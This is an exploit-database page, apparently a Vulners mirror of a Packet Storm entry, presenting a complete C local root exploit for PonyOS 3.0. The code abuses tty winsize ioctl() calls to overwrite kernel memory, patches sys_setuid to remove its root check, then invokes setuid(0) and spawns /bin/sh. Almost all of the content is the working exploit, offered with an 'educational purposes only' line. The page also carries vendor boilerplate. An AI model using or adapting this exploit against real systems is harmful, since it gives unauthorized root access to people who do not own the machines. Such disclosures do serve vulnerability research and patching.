Lucene search
K

PonyOS 3.0 tty ioctl() Privilege Escalation

🗓️ 02 Jun 2015 00:00:00Reported by Hacker FantasticType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

PonyOS 3.0 tty ioctl() Privilege Escalation exploi

Code
`# Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit  
# Google Dork: [if applicable]  
# Date: 29th June 2015  
# Exploit Author: HackerFantastic  
# Vendor Homepage: www.ponyos.org  
# Software Link: [download link if available]  
# Version: [app version] PonyOS <= 3.0  
# Tested on: PonyOS 3.0  
# CVE : N/A  
  
# Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c  
  
/* PonyOS <= 3.0 tty ioctl() root exploit  
========================================  
PonyOS 0.4.99-mlp had two kernel vulnerabilities  
disclosed in April 2013 that could be leveraged   
to read/write arbitrary kernel memory. This is   
due to tty winsize ioctl() allowing to read/write  
arbitrary memory. This exploit patches the setuid  
system call to remove a root uid check allowing  
any process to obtain root privileges.   
  
John Cartwright found these flaws and others here:  
https://www.exploit-db.com/exploits/24933/  
  
Written for educational purposes only. Enjoy!   
  
-- prdelka  
  
*/  
#include <stdio.h>  
#include <stdlib.h>  
#include <sys/ioctl.h>  
  
int main(){  
struct winsize ws;  
printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n");  
memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8);  
ioctl(0, TIOCSWINSZ, &ws);  
ioctl(0, TIOCGWINSZ, (void *)0x0010f101);  
printf("[-] patched sys_setuid()\n");  
__asm("movl $0x18,%eax");  
__asm("xorl %ebx,%ebx");  
__asm("int $0x7F");  
printf("[-] Got root?\n");  
system("/bin/sh");  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation